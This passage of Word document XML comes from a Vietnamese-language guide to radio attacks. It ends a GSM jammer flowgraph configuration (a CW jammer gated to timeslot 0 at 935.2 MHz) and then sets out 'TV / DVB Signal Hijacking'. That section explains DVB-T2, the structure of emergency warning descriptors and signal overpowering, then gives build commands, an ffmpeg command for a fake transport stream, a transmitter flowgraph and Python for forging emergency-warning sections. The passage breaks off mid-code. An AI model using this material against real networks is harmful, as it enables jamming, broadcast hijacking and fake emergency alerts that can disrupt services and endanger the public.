          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - id: burst_timeslot_filter</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    parameters:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      timeslot: 0      # Chỉ TS0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    connections: [gsm_bcch_ccch_demapper]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - id: jamming_signal_source</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    parameters:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      type: complex</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      waveform: CONST  # CW jammer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  - id: uhd_usrp_sink</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    parameters:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      freq: 935.2e6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      gain: 70</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    connections: [jamming_signal_source]  # gated by timeslot filter</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="79" w:name="tv-dvb-signal-hijacking"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. TV / DVB Signal Hijacking</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="75" w:name="kiến-trúc-dvb-t2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 Kiến Trúc DVB-T2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVB-T2 (EN 302 755) – Tiêu chuẩn truyền hình số mặt đất thế hệ 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌────────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                    DVB-T2 Transmitter Chain                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                                    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  Content ──► MPEG-TS ──► ┌─────────────────────────────────────┐  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                           │  DVB-T2 Physical Layer               │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  (Video + Audio          │  BB Scrambler → BCH encoder          │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   + EPG + EWS)           │  → LDPC encoder → Bit Interleaver    │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                           │  → QAM Mapper → OFDM Modulator       │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                           │  → Guard Interval insertion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RF Transmitter         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                              │   UHF band: 470-862 MHz  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                              └─────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OFDM Parameters (DVB-T2):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Giá trị phổ biến</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FFT size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">32K extended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Guard interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1/8, 1/4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">256QAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Code rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3/4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pilot pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PP7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bandwidth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8 MHz (CH21–CH69 UHF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="emergency-warning-system-ews-trong-dvb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 Emergency Warning System (EWS) trong DVB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DVB chuẩn hóa tích hợp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency Warning System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ETSI TS 102 796 – HbbTV 2.0) và</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ARIB B24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(tiêu chuẩn Nhật):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MPEG-TS stream:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── PID 0x0000: PAT (Program Association Table)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      └── PMT cho mỗi program</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">          └── EWS Descriptor (tag 0x6D – Private)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">              ├── Alert Message Category</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">              ├── Alert Text</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">              └── Alert Level (Emergency/Amber/Other)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVB-T Emergency Warning Activation Descriptor:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu broadcaster phát SI (Service Information) với:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  table_id = 0x72 (EWS table)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  → Tất cả TV trong vùng phủ sóng tự động:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     1. Mở nếu đang ở standby</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     2. Chuyển sang kênh phát cảnh báo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">     3. Hiển thị thông báo khẩn cấp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="77" w:name="tấn-công-signal-overpowering"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 Tấn Công Signal Overpowering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nguyên lý:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DVB-T2 receiver chọn tín hiệu mạnh nhất trên cùng tần số (multiplex). Không có cơ chế xác thực nguồn phát trong chuẩn DVB-T2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mạng phát sóng hợp pháp:                  Attacker:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BTS1 ──┐                                   SDR TX ──────────────────────►</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BTS2 ──┤── SFN (Single Frequency Network)  (cùng tần số, công suất cao hơn</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BTS3 ──┘   tại vị trí thu)                 tại vị trí thu)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TV receiver: Chọn tín hiệu mạnh nhất</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Nếu attacker TX mạnh hơn SFN tại điểm thu → TV decode nội dung của attacker</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="triển-khai-với-gnu-radio-gr-dvbt2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4 Triển Khai với GNU Radio + gr-dvbt2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cài đặt gr-dvbt2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/drmpeg/gr-dvbt2.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> gr-dvbt2/build </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> gr-dvbt2/build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cmake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-j4</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make install</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tạo MPEG-TS transport stream chứa nội dung giả</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ffmpeg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> input_video.mp4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-vcodec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mpeg2video </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-b:v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-acodec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mp2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-b:a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192k </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mpegts udp://127.0.0.1:5004</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># GNU Radio flowgraph DVB-T2 transmitter:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># udp_source(5004) → dvbt2_bbheader → dvbt2_bbitinterleaver</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># → dvbt2_miso → dvbt2_pilotgenerator → dvbt2_p1insertion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># → ofdm_cyclic_prefixer → uhd_usrp_sink(channel=21, 474MHz)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Thêm EWS vào MPEG-TS stream:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Chèn Emergency Warning System descriptor vào MPEG-TS SI</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> create_ews_section(alert_text: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, alert_level: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Tạo DVB Private Section chứa EWS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    table_id = 0x72 (private, EWS convention)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    text_encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> alert_text.encode(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EWS private descriptor</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    descriptor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</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BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x6D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># descriptor_tag (private)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(text_encoded)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descriptor_length</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
